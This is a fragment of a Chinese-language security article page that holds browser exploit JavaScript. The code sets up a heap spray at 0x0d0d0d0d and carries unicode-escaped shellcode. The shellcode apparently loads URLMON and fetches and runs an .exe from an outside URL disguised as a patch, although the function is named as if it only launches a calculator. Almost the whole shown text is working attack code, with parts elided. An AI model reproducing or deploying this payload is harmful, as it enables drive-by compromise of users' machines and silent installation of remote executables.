|
……省略……
<SCRIPT language="javascript">
function ClickForRunCalc()
{
var heapSprayToAddress = 0x0d0d0d0d;
var payLoadCode = unescape("%u9090"+"%u9090"+
"%u6460%u30a1%u0000%u8b00%u0c40%u708b%uad1c
%u708b" +
"%u8108%u00ec%u0004%u8b00%u56ec%u8e68%u0e4e
%ue8ec" +
"%u00ff%u0000%u4589%u5604%u9868%u8afe%ue80e
%u00f1" +
"%u0000%u4589%u5608%u2568%uffb0%ue8c2%u00e3
%u0000" +
"%u4589%u560c%uef68%ue0ce%ue860%u00d5%u0000
%u4589" +
"%u5610%uc168%ue579%ue8b8%u00c7%u0000%u4589
%u4014" +
"%u3880%u75c3%u89fa%u1845%u08e9%u0001%u5e00
%u7589" +
"%u8b24%u0445%u016a%u8b59%u1855%ue856%u008c
%u0000" +
"%u6850%u1a36%u702f%u98e8%u0000%u8900%u1c45
%uc58b" +
"%uc083%u8950%u2045%uff68%u0000%u5000%u458b
%u6a14" +
"%u5902%u558b%ue818%u0062%u0000%u4503%uc720
%u5c00" +
"%u2e7e%uc765%u0440%u6578%u0000%u75ff%u8b20
%u0c45" +
"%u016a%u8b59%u1855%u41e8%u0000%u6a00%u5807
%u4503" +
"%u3324%u53db%uff53%u2075%u5350%u458b%u6a1c
%u5905" +
"%u558b%ue818%u0024%u0000%u006a%u75ff%u8b20
%u0845" +
"%u026a%u8b59%u1855%u11e8%u0000%u8100%u00c4
%u0004" +
"%u6100%uc481%u04dc%u0000%uc25d%u0024%u5b41
%u0352" +
"%u03e1%u03e1%u03e1%u83e1%u04ec%u535a%uda8b
%uf7e2" +
"%uff52%u55e0%uec8b%u7d8b%u8b08%u0c5d%u8b56
%u3c73" +
"%u748b%u781e%uf303%u8b56%u2076%uf303%uc933
%u4149" +
"%u03ad%u56c3%uf633%ube0f%u3a10%u74f2%uc108
%u0dce" +
"%uf203%ueb40%u3bf1%u5efe%ue575%u8b5a%u8beb
%u245a" +
"%udd03%u8b66%u4b0c%u5a8b%u031c%u8bdd%u8b04
%uc503" +
"%u5d5e%u08c2%ue800%ufef3%uffff%u5255%u4d4c
%u4e4f" +
"%u6800%u7474%u3a70%u2f2f%u6e63%u7466%u2e70
%u6a62" +
"%u7475%u652e%u7564%u632e%u2f6e%u7570%u2f62
%u6170" +
"%u6374%u6568%u2f73%u736d%u5052%u2f43%u6946
%u5778" +
"%u6c65%u6863%u652e%u6578%u0000");
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
……省略……
ClickForRunCalc();
</script>
……省略…… | 
安全中国首页 > 文章中心 > 其他漏洞研究